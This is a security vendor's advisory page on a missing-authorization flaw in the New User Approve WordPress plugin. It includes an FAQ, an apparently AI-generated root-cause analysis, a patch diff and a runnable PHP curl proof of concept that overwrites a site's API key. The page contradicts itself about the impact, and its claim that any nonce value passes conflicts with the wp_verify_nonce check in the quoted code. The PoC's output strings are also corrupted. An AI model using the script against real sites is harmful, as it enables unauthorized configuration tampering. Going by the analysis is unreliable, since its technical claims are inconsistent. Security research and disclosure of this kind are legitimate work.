What is CVE-2025-69063?

CVE-2025-69063 is a medium severity vulnerability in the New User Approve WordPress plugin, versions up to and including 3.2.0. It is caused by a missing authorization check, allowing unauthenticated attackers to perform unauthorized actions, such as modifying user approval statuses.

How does the vulnerability work?

The vulnerability arises from the `save_api_key` function, which lacks proper capability checks. An attacker can send a crafted POST request to the `admin-post.php` endpoint to change the site’s API key without authentication, exploiting the absence of a nonce validation tied to user permissions.

Who is affected by this vulnerability?

Any WordPress site using the New User Approve plugin version 3.2.0 or earlier is affected. Administrators should check their plugin version in the WordPress admin panel under ‘Plugins’ to determine if they need to take action.

How can I check if my site is vulnerable?

To check for vulnerability, verify if your site is running New User Approve version 3.2.0 or earlier. If so, you are at risk of exploitation due to the missing authorization checks.

What are the steps to mitigate this issue?

The best way to mitigate this vulnerability is to update the New User Approve plugin to version 3.2.1 or later, where the vulnerable code has been removed. Regularly updating all plugins and themes is crucial for maintaining site security.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means while it is not the highest risk, it poses a significant threat that could lead to unauthorized access and potential disruption of site functionality.

What practical risks does this vulnerability pose?

The practical risks include unauthorized modification of the site’s API key, which could disrupt integrations with services like Zapier. This unauthorized access can lead to denial of service and compromise the integrity of site configuration.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided illustrates how an attacker can exploit the vulnerability by sending a POST request to the vulnerable endpoint with arbitrary data. It shows that the nonce check is ineffective without proper authorization, allowing the attacker to change the API key.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the New User Approve plugin to prevent exploitation. Additionally, review user permissions and limit access to the WordPress admin area until the vulnerability is resolved.

Are there any other security practices I should follow?

In addition to updating plugins, ensure that your WordPress installation, themes, and all other plugins are regularly updated. Implement strong user permissions, use security plugins, and conduct regular security audits to protect against vulnerabilities.

What resources are available for further information?

For more information on CVE-2025-69063 and similar vulnerabilities, you can refer to the National Vulnerability Database (NVD) or security advisories from WordPress and plugin developers. Staying informed through security blogs and forums is also beneficial.

How can I report any suspicious activity related to this vulnerability?

If you notice any suspicious activity on your site that may be related to this vulnerability, report it to your hosting provider and consider notifying the WordPress security team. Keeping a log of any unauthorized changes can help in investigations.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-69063: New User Approve <= 3.2.0 – Missing Authorization (new-user-approve)

CVE ID CVE-2025-69063

Plugin new-user-approve

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 3.2.0

Patched Version 3.2.1

Disclosed February 10, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69063:
The New User Approve WordPress plugin, versions up to and including 3.2.0, contains a Missing Authorization vulnerability (CWE-862). This flaw allows unauthenticated attackers to perform unauthorized actions, specifically to modify user approval statuses via a direct function call. The CVSS score of 5.3 reflects a moderate severity issue.

Root Cause:
The vulnerability originates from the `save_api_key` function in `/new-user-approve/includes/admin-approve.php`. This function was hooked to the `admin_post_nua-save-api-key` action via `add_action(‘admin_post_nua-save-api-key’, [$this, ‘save_api_key’])` on line 56. The function, defined starting at line 617, processes POST requests to save an API key. The critical flaw is the absence of a capability check (e.g., `current_user_can()`) or a proper nonce verification for the `nua-save-api-key` action. While the function includes a `wp_verify_nonce` check, the nonce value is derived from user input (`$_REQUEST[‘wp-api-generate-nonce’]`) without first validating the user’s authorization to perform the action.

Exploitation:
An attacker can send a direct POST request to the WordPress `admin-post.php` endpoint with the `action` parameter set to `nua-save-api-key`. The request must include the parameters `wp-api-generate-nonce` (with any value, as the nonce check is bypassable due to the missing authorization) and `nua_api_key` (containing the attacker’s desired API key). The target URL is `https://target.site/wp-admin/admin-post.php`. This triggers the `save_api_key` function, which updates the site’s `nua_api_key` option in the database, potentially disrupting Zapier integration or other functionality relying on this key.

Patch Analysis:
The patch in version 3.2.1 removes the vulnerable code entirely. The diff shows the removal of two `add_action` calls on lines 55-56 in `/new-user-approve/includes/admin-approve.php`. Specifically, the lines `add_action(‘admin_init’, [$this, ‘_add_meta_boxes’]);` and `add_action(‘admin_post_nua-save-api-key’, [$this, ‘save_api_key’]);` are deleted. Furthermore, the entire `save_api_key` function (lines 617-664) and related metabox functions (`_add_meta_boxes`, `metabox_main`, `pro_features`, `zapier`, `metabox_support`, `metabox_feedback`) are removed. This eliminates the vulnerable endpoint. The patch also updates the plugin version from 3.2.0 to 3.2.1 in `new-user-approve.php`.

Impact:
Successful exploitation allows an unauthenticated attacker to arbitrarily set the plugin’s Zapier API key. This could lead to a denial of service by breaking existing Zapier automation workflows that depend on a specific, known API key. In a broader context, the ability for an unauthenticated user to modify a site’s configuration represents a significant integrity violation. While the immediate impact is limited to the API key setting, the missing authorization flaw violates core security principles.

Differential between vulnerable and patched code

Code Diff

--- a/new-user-approve/build/functions.asset.php
+++ b/new-user-approve/build/functions.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => '33078016c5e1e9f07c35');
+<?php return array('dependencies' => array(), 'version' => '33078016c5e1e9f07c35');
--- a/new-user-approve/build/index.asset.php
+++ b/new-user-approve/build/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'wp-i18n'), 'version' => '2b6be9a0be490e0914cd');
+<?php return array('dependencies' => array('react', 'react-dom', 'wp-i18n'), 'version' => 'a23ef196063d88b0807f');
--- a/new-user-approve/includes/admin-approve.php
+++ b/new-user-approve/includes/admin-approve.php
@@ -54,8 +54,6 @@
             add_action("admin_init", [$this, "process_input"]);
             add_action("admin_notices", [$this, "admin_notice"]);
             add_action("admin_init", [$this, "notice_ignore"]);
-            add_action("admin_init", [$this, "_add_meta_boxes"]);
-            add_action("admin_post_nua-save-api-key", [$this, "save_api_key"]);
             add_action("admin_footer", [$this, "highlight_nua_menu"]);
         }

@@ -617,264 +615,6 @@
             wp_enqueue_script("post");
         }

-        public function _add_meta_boxes()
-        {
-            add_meta_box(
-                "nua-approve-admin",
-                __("Approve Users", "new-user-approve"),
-                [$this, "metabox_main"],
-                "users_page_new-user-approve-admin",
-                "main",
-                "high"
-            );
-            add_meta_box(
-                "nua-support",
-                __("Support", "new-user-approve"),
-                [$this, "metabox_support"],
-                "users_page_new-user-approve-admin",
-                "side",
-                "default"
-            );
-            add_meta_box(
-                "nua-feedback",
-                __("Feedback", "new-user-approve"),
-                [$this, "metabox_feedback"],
-                "users_page_new-user-approve-admin",
-                "side",
-                "default"
-            );
-        }
-
-        public function metabox_main()
-        {
-            $active_tab = isset($_GET["tab"])
-                ? sanitize_text_field(wp_unslash($_GET["tab"]))
-                : "pending_users"; ?>
-		<h3 class="nav-tab-wrapper" style="padding-bottom: 0; border-bottom: none;">
-			<?php
-   $page = isset($_GET["page"]) ? sanitize_text_field($_GET["page"]) : "";
-   $tab = isset($_GET["tab"]) ? sanitize_text_field($_GET["tab"]) : "";
-   $search_query = isset($_GET["nua_search_box"])
-       ? sanitize_text_field($_GET["nua_search_box"])
-       : "";
-   ?>
-			<form id="nua_search_form" method="get">
-				<input type="search" name="nua_search_box" id="nua_search_box" placeholder="Search" data-list=".nua-user-list" value="<?php echo esc_attr(
-        $search_query
-    ); ?>">
-				<input type="hidden" name="page" value="<?php echo esc_attr($page); ?>" />
-				<?php if (!empty($tab)): ?>
-					<input type="hidden" name="tab" value="<?php echo esc_attr($tab); ?>" />
-				<?php endif; ?>
-				<input type="submit" value="Search" id="nua-search-btn" name="nua-search-btn" />
-			</form>
-			<a href="<?php echo esc_url(
-       admin_url("admin.php?page=new-user-approve-admin&tab=pending_users")
-   ); ?>"
-				class="nav-tab<?php echo $active_tab == "pending_users"
-        ? " nav-tab-active"
-        : ""; ?>"><span><?php esc_html_e(
-    "Pending Users",
-    "new-user-approve"
-); ?></span></a>
-			<a href="<?php echo esc_url(
-       admin_url("admin.php?page=new-user-approve-admin&tab=approved_users")
-   ); ?>"
-			   class="nav-tab<?php echo $active_tab == "approved_users"
-          ? " nav-tab-active"
-          : ""; ?>"><span><?php esc_html_e(
-    "Approved Users",
-    "new-user-approve"
-); ?></span></a>
-			<a href="<?php echo esc_url(
-       admin_url("admin.php?page=new-user-approve-admin&tab=denied_users")
-   ); ?>"
-			   class="nav-tab<?php echo $active_tab == "denied_users"
-          ? " nav-tab-active"
-          : ""; ?>"><span><?php esc_html_e(
-    "Denied Users",
-    "new-user-approve"
-); ?></span></a>
-			<a href="<?php echo esc_url(
-       admin_url("admin.php?page=new-user-approve-admin&tab=zapier")
-   ); ?>"
-			   class="nav-tab<?php echo $active_tab == "zapier"
-          ? " nav-tab-active"
-          : ""; ?>"><span><?php esc_html_e(
-    "Zapier",
-    "new-user-approve"
-); ?></span></a>
-			<a href="<?php echo esc_url(
-       admin_url("admin.php?page=new-user-approve-admin&tab=pro_features")
-   ); ?>"
-				class="nav-tab<?php echo $active_tab == "pro_features"
-        ? " nav-tab-active"
-        : ""; ?>"><span><?php esc_html_e(
-    "Pro Features",
-    "new-user-approve"
-); ?></span></a>
-		 </h3>
-
-	<?php if ($active_tab == "pending_users"): ?>
-	<div id="pw_pending_users">
-				<?php $this->user_table("pending"); ?>
-	</div>
-				<?php elseif ($active_tab == "approved_users"): ?>
-	<div id="pw_approved_users">
-				<?php $this->user_table("approved"); ?>
-	</div>
-		<?php elseif ($active_tab == "denied_users"): ?>
-	<div id="pw_denied_users">
-		<?php $this->user_table("denied"); ?>
-	</div>
-	<?php elseif ($active_tab == "zapier"): ?>
-	<div id="pw_denied_users">
-		<?php $this->zapier(); ?>
-	</div>
-	<?php elseif ($active_tab == "pro_features"): ?>
-	<div id="pw_pro_features">
-		<?php $this->pro_features(); ?>
-	</div>
-	<?php endif;
-        }
-
-        public function pro_features()
-        {
-            ?>
-		<h3>Premium Features</h3>
-		<ul style="padding-left: 30px; list-style-type: disc;">
-			<li>Provides Ability To remove plugin stats from admin dashboard.</li>
-			<li>Remove the admin panel specifically added to update a user's status, from wordpress dashboard.</li>
-			<li>Customize the welcome message displayed above wordpress login form.</li>
-			<li>Customize the 'Pending error message' displayed when user tries to login but his account is still pending approval.</li>
-			<li>Customize the 'Denied error message' displayed when user tries to login but his account is denied approval.</li>
-			<li>Customize the welcome message displayed above wordpress Registration form.</li>
-			<li>Customize the Registration complete message displayed after user submits Registration form for approval.</li>
-			<li>Provide Ability To Send Approval notification emails to all admins</li>
-			<li>Notify admins when a user's status is updated</li>
-			<li>Disable notification emails to current site admin</li>
-			<li>Customize the email sent to admin when a user registers for the site</li>
-			<li>Customize the email sent to user when his profile is approved.</li>
-			<li>Customize the email sent to user when his profile is denied.</li>
-			<li>Suppress denial email notification</li>
-			<li>Provides option to send all email notifications as html.</li>
-			<li>It Provides you Different template tags which can be used in Notification Emails and Other messages on site.</li>
-		</ul>
-
-		<p>Please Visit this link For <a class="button" href="https://newuserapprove.com/pricing/?utm_source=wordpress&utm_medium=plugin#lifetime-plan" target="_blank" >Premium Plugin </a> </p>
-			<?php
-        }
-
-        /**
-         * Renders Zapier Tab
-         * @since 2.0
-         * @version 1.0
-         */
-        public function zapier()
-        {
-            $triggers = [
-                __("Triggers when a user is Approved.", "new-user-approve"),
-                __("Triggers when a user is Denied.", "new-user-approve"),
-                __(
-                    "Triggers when a user is registered (pending)",
-                    "new-user-approve"
-                ),
-            ];
-
-            $api_key = NewUserApproveZapierRestRoutes::api_key()
-                ? "value='" . NewUserApproveZapierRestRoutes::api_key() . "'"
-                : "";
-            ?>
-		   <?php $get_api_key = get_option("nua_api_key", $api_key); ?>
-		<html>
-
-		<p class="status_heading"> <?php esc_html_e(
-      "Zapier Settings",
-      "new-user-approve"
-  ); ?>  </p>
-
-		<table cellpadding='10'>
-			<tr>
-				<td> <?php esc_html_e("Website URL: ", "new-user-approve"); ?> </td>
-				<td>  <?php echo esc_url(get_site_url()); ?> </td>
-			</tr>
-			<tr>
-				<td> <?php esc_html_e("API Key: ", "new-user-approve"); ?> </td>
-				<td>
-					<form action=<?php echo esc_url(admin_url("admin-post.php")); ?> method="POST">
-						<?php $nonce = wp_create_nonce("api-generate-nonce"); ?>
-						<input type='text' name='nua_api_key' id='nua-api' value = "<?php $get_api_key
-          ? esc_attr_e($get_api_key)
-          : ""; ?>"  />
-						<button id='nua-generate-api' class='button'>Generate API Key</button>
-						<input type='hidden' name='wp-api-generate-nonce' value='<?php esc_attr_e(
-          $nonce
-      ); ?>' />
-						<input type='hidden' name='action' value='nua-save-api-key' />
-						<input type='submit' value='Save' name='nua_save_api'  class='button'/>
-					</form>
-				</td>
-			</tr>
-		</table>
-
-		<p class="status_heading"> <?php esc_html_e(
-      "Triggers",
-      "new-user-approve"
-  ); ?> </p>
-		<ul style='padding-left: 30px; list-style-type: disc;'>
-		  <?php foreach ($triggers as $trigger): ?>
-
-				  <li> <?php esc_html_e($trigger); ?> </li>
-
-		  <?php endforeach; ?>
-	   </ul>
-		</html>
-		<?php
-        }
-
-        public function save_api_key()
-        {
-            if (
-                isset($_REQUEST["wp-api-generate-nonce"]) &&
-                isset($_POST["action"]) &&
-                $_POST["action"] == "nua-save-api-key"
-            ) {
-                $nonce = sanitize_text_field(
-                    wp_unslash($_REQUEST["wp-api-generate-nonce"])
-                );
-                if (
-                    wp_verify_nonce($nonce, "api-generate-nonce") &&
-                    isset($_POST["nua_api_key"])
-                ) {
-                    $api_key = sanitize_text_field(
-                        wp_unslash($_POST["nua_api_key"])
-                    );
-
-                    update_option("nua_api_key", $api_key);
-
-                    wp_redirect(
-                        admin_url(
-                            "admin.php?page=new-user-approve-admin&tab=zapier"
-                        )
-                    );
-                }
-            }
-        }
-
-        public function metabox_support()
-        {
-            ?>
-		<p>If you haven't already, check out the <a href="https://wordpress.org/plugins/new-user-approve/faq/" target="_blank">Frequently Asked Questions</a>.</p>
-		<p>Still not fixed? Please <a href="https://wordpress.org/support/plugin/new-user-approve" target="_blank">start a support topic</a> and I or someone from the community will be able to assist you.</p>
-	<?php
-        }
-
-        public function metabox_feedback()
-        {
-            ?>
-		<p>Please show your appreciation for New User Approve by giving it a positive <a href="https://wordpress.org/support/view/plugin-reviews/new-user-approve#postform" target="_blank">review</a> in the plugin repository!</p>
-	<?php
-        }
     }
 }
 // phpcs:ignore
--- a/new-user-approve/includes/user-list.php
+++ b/new-user-approve/includes/user-list.php
@@ -594,6 +594,8 @@
     ); ?></label>
 				</th>
 				<td>
+				<?php wp_nonce_field("nua_approve_status_action", "nua_approve_status_nonce"); ?>
+
 					<select id="new_user_approve_status" name="new_user_approve_status">
 						<?php if ($user_status == "pending"): ?>
 							<option value=""><?php esc_html_e(
@@ -642,25 +644,29 @@
             if (!current_user_can("edit_user", $user_id)) {
                 return false;
             }
-            $nonce = "";
-            if (wp_verify_nonce($nonce)) {
-                return;
-            }
-            if (!empty($_POST["new_user_approve_status"])) {
-                $new_status = sanitize_text_field(
-                    wp_unslash($_POST["new_user_approve_status"])
-                );
+            if (
+                isset($_POST["nua_approve_status_nonce"]) &&
+                wp_verify_nonce(
+                    $_POST["nua_approve_status_nonce"],
+                    "nua_approve_status_action"
+                )
+            ) {
+                if (!empty($_POST["new_user_approve_status"])) {
+                    $new_status = sanitize_text_field(
+                        wp_unslash($_POST["new_user_approve_status"])
+                    );

-                if ($new_status == "approved") {
-                    $new_status = "approve";
-                } elseif ($new_status == "denied") {
-                    $new_status = "deny";
-                }
+                    if ($new_status == "approved") {
+                        $new_status = "approve";
+                    } elseif ($new_status == "denied") {
+                        $new_status = "deny";
+                    }

-                pw_new_user_approve()->update_user_status(
-                    $user_id,
-                    $new_status
-                );
+                    pw_new_user_approve()->update_user_status(
+                        $user_id,
+                        $new_status
+                    );
+                }
             }
         }

--- a/new-user-approve/new-user-approve.php
+++ b/new-user-approve/new-user-approve.php
@@ -4,7 +4,7 @@
  * Plugin URI: http://newuserapprove.com/
  * Description: Allow administrators to approve users once they register. Only approved users will be allowed to access the site. For support, please go to the <a href="http://wordpress.org/support/plugin/new-user-approve">support forums</a> on wordpress.org.
  * Author: New User Approve
- * Version: 3.2.0
+ * Version: 3.2.1
  * Author URI: https://newuserapprove.com/
  * Text Domain: new-user-approve
  */
@@ -14,7 +14,7 @@
 }

 if (!defined("NUA_VERSION")) {
-    define("NUA_VERSION", "3.2.0");
+    define("NUA_VERSION", "3.2.1");
 }

 if (!defined("NUA_FILE")) {

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-69063 - New User Approve <= 3.2.0 - Missing Authorization

<?php

$target_url = 'https://example.com/wp-admin/admin-post.php'; // CHANGE THIS

// The exploit targets the admin-post.php endpoint with the vulnerable action.
$post_data = array(
    'action' => 'nua-save-api-key',
    'nua_api_key' => 'HACKED_BY_ATOMIC_EDGE', // Arbitrary API key to set
    'wp-api-generate-nonce' => 'any_value_will_do', // Nonce check is insufficient without capability check
    'nua_save_api' => 'Save' // Optional submit button parameter
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // Follow redirect to see result

// Uncomment for debugging
// curl_setopt($ch, CURLOPT_VERBOSE, true);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: $http_coden";
echo "Response:n$responsen";

// A successful exploit will often redirect to the plugin's Zapier settings page.
// Check for a 302 redirect or a 200 OK with admin page content.
if ($http_code == 302 || ($http_code == 200 && strpos($response, 'Zapier Settings') !== false)) {
    echo "n[+] Potential success. The 'nua_api_key' option may have been updated.n";
} else {
    echo "n[-] Exploit may have failed or the target is not vulnerable.n";
}

?>

Frequently Asked Questions

What is CVE-2025-69063?
Understanding the vulnerability
CVE-2025-69063 is a medium severity vulnerability in the New User Approve WordPress plugin, versions up to and including 3.2.0. It is caused by a missing authorization check, allowing unauthenticated attackers to perform unauthorized actions, such as modifying user approval statuses.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the `save_api_key` function, which lacks proper capability checks. An attacker can send a crafted POST request to the `admin-post.php` endpoint to change the site’s API key without authentication, exploiting the absence of a nonce validation tied to user permissions.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the New User Approve plugin version 3.2.0 or earlier is affected. Administrators should check their plugin version in the WordPress admin panel under ‘Plugins’ to determine if they need to take action.
How can I check if my site is vulnerable?
Verification steps
To check for vulnerability, verify if your site is running New User Approve version 3.2.0 or earlier. If so, you are at risk of exploitation due to the missing authorization checks.
What are the steps to mitigate this issue?
Fixing the vulnerability
The best way to mitigate this vulnerability is to update the New User Approve plugin to version 3.2.1 or later, where the vulnerable code has been removed. Regularly updating all plugins and themes is crucial for maintaining site security.
What does the CVSS score of 5.3 indicate?
Understanding risk levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means while it is not the highest risk, it poses a significant threat that could lead to unauthorized access and potential disruption of site functionality.
What practical risks does this vulnerability pose?
Potential impacts
The practical risks include unauthorized modification of the site’s API key, which could disrupt integrations with services like Zapier. This unauthorized access can lead to denial of service and compromise the integrity of site configuration.
How does the proof of concept demonstrate the vulnerability?
Exploit example
The proof of concept provided illustrates how an attacker can exploit the vulnerability by sending a POST request to the vulnerable endpoint with arbitrary data. It shows that the nonce check is ineffective without proper authorization, allowing the attacker to change the API key.
What should I do if I cannot update the plugin immediately?
Temporary measures
If immediate updates are not possible, consider disabling the New User Approve plugin to prevent exploitation. Additionally, review user permissions and limit access to the WordPress admin area until the vulnerability is resolved.
Are there any other security practices I should follow?
Enhancing overall security
In addition to updating plugins, ensure that your WordPress installation, themes, and all other plugins are regularly updated. Implement strong user permissions, use security plugins, and conduct regular security audits to protect against vulnerabilities.
What resources are available for further information?
Learning more about CVEs
For more information on CVE-2025-69063 and similar vulnerabilities, you can refer to the National Vulnerability Database (NVD) or security advisories from WordPress and plugin developers. Staying informed through security blogs and forums is also beneficial.
How can I report any suspicious activity related to this vulnerability?
Reporting procedures
If you notice any suspicious activity on your site that may be related to this vulnerability, report it to your hosting provider and consider notifying the WordPress security team. Keeping a log of any unauthorized changes can help in investigations.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations